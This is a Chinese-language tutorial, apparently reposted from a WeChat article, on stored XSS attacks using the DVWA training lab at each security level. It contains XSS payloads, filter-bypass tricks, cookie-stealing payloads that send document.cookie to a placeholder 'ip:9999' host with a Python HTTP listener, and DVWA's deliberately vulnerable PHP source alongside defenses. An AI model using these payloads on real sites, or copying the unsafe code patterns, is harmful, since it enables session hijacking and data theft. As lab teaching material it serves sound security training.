Web 安全中的 XSS 攻击详细教学(二)–已完结
前言
上一篇介绍了 XSS 的反射型 XSS和DOM 型 XSS 攻击以及 Xss-Labs 通关的全教程解析,接下来介绍的是持久性 XSS 攻击教学(严禁用于非法用途),这是另一种常见的 XSS 攻击类型。存储型 XSS 攻击发生在攻击者将恶意脚本存储在目标服务器上,当其他用户访问受感染的页面时,恶意脚本会被执行。
存储型 XSS(持久性 XSS)
存储型 XSS,又称持久性 XSS,他们和反射性 XSS 最大的不同就是,攻击脚本将被永久地存放在目标服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交 XSS 代码,又有点类似于 Sql 注入,但不同于 Sql 注入。
这种攻击多见于论坛,攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入到帖子的内容之中。随着帖子被论坛服务器存储下来,恶意脚本也永久地被存放在论坛服务器的后端存储器中。当其它用户浏览这个被注入了恶意脚本的帖子的时候,恶意脚本则会在他们的浏览器中得到执行,从而受到了攻击。
持久型 XSS 的三大特点:
- 1. 持久性,植入在数据库中;
- 2. 危害面广,甚至可以让用户机器变成 DDoS 攻击的肉鸡;
- 3. 盗取用户敏感私密信息。
如何防御?
- 1. 后端在入库前应该选择不相信任何前端数据,将所有的字段统一进行转义处理;
- 2. 后端在输出给前端数据统一进行转义处理;
- 3. 前端在渲染页面 DOM 的时候应该选择不相信任何后端数据,任何字段都需要做转义处理。
漏洞复现–DVWA
LOW
尝试注入 JavaScript 脚本
<script>alert()</script>
执行正常注入成功
尝试分析源码,完全没有对 XSS 的防护,另外对 SQL 注入的防护也不彻底。
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
//trim() 函数只能去除字符串的首尾字符,这里没有第二个参数,默认去除首尾空格
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
//stripslashes() 删除字符串中的反斜杠
$message = stripslashes( $message );
//mysqli_real_escape_string() 函数转义了特殊字符(包括NUL(ASCII 0)、\n、\r、\、'、" 和 Control-Z),然后直接代入mysqli_query()函数来执行INSERT INTO的SQL语句。
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// 要执行的sql语句
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
这里还有一共攻击方式使用 xss 攻击获取 cookie,payload 如下
<script>document.write('<img src="http://ip:9999/'+document.cookie+'"/>')</script>
简单地起 http 协议的方法有两种:
(1)用 python2:
python2 -m SimpleHTTPServer 8899
(2)用 python3:
python3 -m http.server 8899
注入 payload
成功获取 cookie 信息
P.S. 测试的时候还发现每次点击浏览器的刷新键,都会再生成一个一条 guestbook 记录。这应该是 low 等级没有做防止表单重复提交的动作。
Medium
尝试使用上一关的内容进行注入。
注入失败
盲注尝试第一个框,而且输入框限制了文字的输入长度
似乎有效果
尝试修改 input 框的输入长度限制
payload 如下
<a href="javascript:alert()">alert()</a>
注入成功
源码分析
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// strip_tags() 函数用于从字符串中去除HTML和PHP标签
// addslashes() 用于在字符串中的单引号(')、双引号(")、反斜杠(\)和NULL字符(\0)前面添加反斜杠
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// htmlspecialchars() 用于将特殊字符转换为HTML实体,特殊字符包含&、<、>、'、"
$message = htmlspecialchars( $message );
// 将指定字符串替换为空
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
仔细分析源码会发现,它只将 message 框的函数进行了一个 strip_tags 字符判断,但是并没有对 name 框的值进行判断,此处仅仅只是进行了删除 script,所以我们可以可以尝试以下俩种方式:
- 1. 双写绕过,例如
<sc<script>ript>alert()<sc<script>ript>
- 2. 大小写绕过,把标签名称改为
<sCript>
,任意字符大写即可
High
单标签
使用上一关的 payload 测试
失败
尝试半包,发现对字符进行了转义。
尝试单个标签 img,并添加点击事件 onclick,即可注入成功
<img src=1 onclick=alert() /><!--注意不要少了空格-->
cookie
在单标签的情况进行获取 cookie,payload 如下
<img src=1 onclick="document.write('<img src="http://ip:9999/'+document.cookie+'"/>')" />
http 端口也没有监听到 cookie 信息尝试失败
之后试了试 svg,也不行在我百思不得其解的时候,想到了这么一个标签input,onchange 事件
<input onchange="alert()">
成功了!那么再利用这个 input 标签,去获取我们的 dvwa 站点的 cookie 信息
<input οnchange="document.write('<img src="http://ip:999/'+document.cookie+'"/>')">
emmmm,尝试了好几遍,注入失败了,不知道为什么
看源码。。。。
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
它使用 preg_replace 正则替换没思路了,有没有大佬帮帮我呀 T_T
IMPOSSIBLE
源码分析
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// checkToken() 检查token是否存在,使用csrf_token,防止CSRF攻击,还解决了表单重复提交的问题
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// 将参数俩边的空格去掉
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// 去掉message框的反斜杠
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// 将message框中的值转化为html实体
$message = htmlspecialchars( $message );
// 去掉name中的反斜杠
$name = stripslashes( $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$name = htmlspecialchars( $name );
// 执行sql语句,并使用了PDO进行了预编译,预防sql注入攻击
$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
$data->bindParam( ':message', $message, PDO::PARAM_STR );
$data->bindParam( ':name', $name, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
原文链接:https://mp.weixin.qq.com/s/PKs1TTg8XyU-UBOZTY5Olg